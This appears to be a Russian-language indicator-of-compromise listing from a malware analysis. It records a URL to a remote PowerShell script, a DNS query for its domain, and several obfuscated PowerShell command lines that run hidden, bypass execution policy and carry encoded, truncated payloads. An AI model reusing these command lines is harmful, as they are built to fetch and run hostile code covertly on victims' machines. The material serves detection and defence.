Техническая информация
- h+t+t+p+:+/+/+a+p+p+-+d+o+c+-+a+d+m+i+.+c+1+.+b+i+z+/+l+o+c+a+l+.+p+s+1
- '<LOCALNET>.0.64':444
- http://ap####c-admi.c1.biz/local.ps1
- DNS ASK ap####c-admi.c1.biz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WIND hIddEn -cOMMaN "(-JOIN(('5365542d5641724961624c45206137576b716930334261627520333b7365742d5641526941424c6520463252744e577672766545552036333b7345542d5661524941624c45204458714e3669347a6b7559...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WIND hIddEn -cOMMaN "(-JOIN(('5365542d5641724961624c45206137576b716930334261627520333b7365742d5641526941424c6520463252744e577672766545552036333b7345542d5661524941624c45204458714e3669347a6b7559...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noNi -NolOGo -NoPRoFi -WInD hIdDeN -exEcUtiOnpOliC bYpAss -ec cwBFAHQALQBWAEEAcgBpAGEAYgBsAEUAIABqADUARQBFAE4AegBWAHoANQBHAEkAeAAgADMANwA7AHMARQB0AC0AVgBhAHIAaQBBAEIAbABlACAAVgBIADgASQAxAEEAaQ...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nONinT -NOlo -nOpROF -WiNDo hIDDen -eXEcutionpoLI bYPaSs -ec KAAtAGoATwBJAE4AKAAoACcAMgA0ADUAMAA0ADEANgAzADYANgA0ADYANwAxADcANgAzADQAMwAzADQAOQA1ADIAMwA2ADMAZAAyADgANgBlADYANQA1ADcAMgBkADQAZgA...